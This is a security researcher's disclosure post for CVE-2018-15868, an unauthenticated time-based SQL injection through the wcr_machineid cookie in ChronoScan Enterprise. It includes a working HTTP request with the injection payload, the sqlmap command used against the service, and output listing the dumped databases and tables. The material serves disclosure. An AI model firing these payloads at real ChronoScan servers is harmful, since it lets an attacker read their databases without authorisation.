ChronoScan Enterprise Unauthenticated SQL Injection


ChronoScan is an OCR software created by ChronoScan Capture S.L. used to read and parse of data from documents it receives. The software will take a document/pdf and based on how you have it setup, parse selected data from the input file. This is especially helpful in situations where there is an automated process sending a high number of documents that need to be put into a database or some other type of storage quickly. They have a community and enterprise versions.


I've identified an unauthenticated time-based SQL injection on the latest ChronoScan enterprise version (v1.5.4.3 as of 8-24-2018). This vulnerability has not yet been confirmed on other versions but, due to the nature of the attack (unauthenticated, no specific parameters, etc), I believe it's present on all versions up to this point. I will update this post when the vendor has confirmed to which versions are affected.

The vulnerability lies in how the wcr_machineid cookie is used with identifying users and the sessions associated with them. In this case, it seems as though the wcr_machineid cookie is inserted unsanitized into a SQL statement to check the current “machines” access level. An unauthenticated attacker can (even without a valid wcr_machineid cookie) exploit a time-based SQL injection. Below is the request that was originally used for identification.

GET / HTTP/1.1
Host: vulnerable:10000
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://vulnerable:10000/?wtd=VQWist5qQW3IS6uy
Cookie: wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1

If you compare this request (a delay of 20 seconds) to one without the SQL statement, you will see it takes ~20 seconds for the response to come back. I took this and ran the following command in sqlmap which led to confirmation of a vulnerability.

sqlmap -u "http://vulnerable:10000" --cookie="wcr_machineid=*;wcr_uspw=deleted;wcr_repw=1"

After confirmation, I dumped the following databases.

[*] master
[*] model
[*] msdb
[*] tempdb

Dumping the tables (60 total) from the CHRONOSCAN database gave me the following.

[12:01:33] [INFO] fetching tables for database: CHRONOSCAN
[12:01:33] [INFO] fetching number of tables for database 'CHRONOSCAN'
[12:01:33] [INFO] resumed: 60
[12:01:33] [INFO] resumed: dbo.chrono_Buyers
[12:01:33] [INFO] resumed: dbo.chrono_Suppliers
[12:01:33] [INFO] resumed: dbo.chronosys_csi_export_history
[12:01:33] [INFO] resumed: dbo.chronosys_csi_user_params
[12:01:33] [INFO] resumed: dbo.chronosys_doctype_options
[12:01:33] [INFO] resumed: dbo.chronosys_entities
[12:01:33] [INFO] resumed: dbo.chronosys_entities_params
[12:01:33] [INFO] resumed: dbo.chronosys_entity_masterkey_line_account
[12:01:33] [INFO] resumed: dbo.chronosys_event_track
[12:01:33] [INFO] resumed: dbo.chronosys_job_types_cache


-August 24, 2018: Vulnerability Identified -August 24, 2018: Vendor Notified & Acknowledged -August 24, 2018: CVE ID requested -August 24, 2018: CVE-2018-15868 reserved -August 27, 2018: Details provided to MITRE -August 28, 2018: Vendor issues patch for verification (not public yet)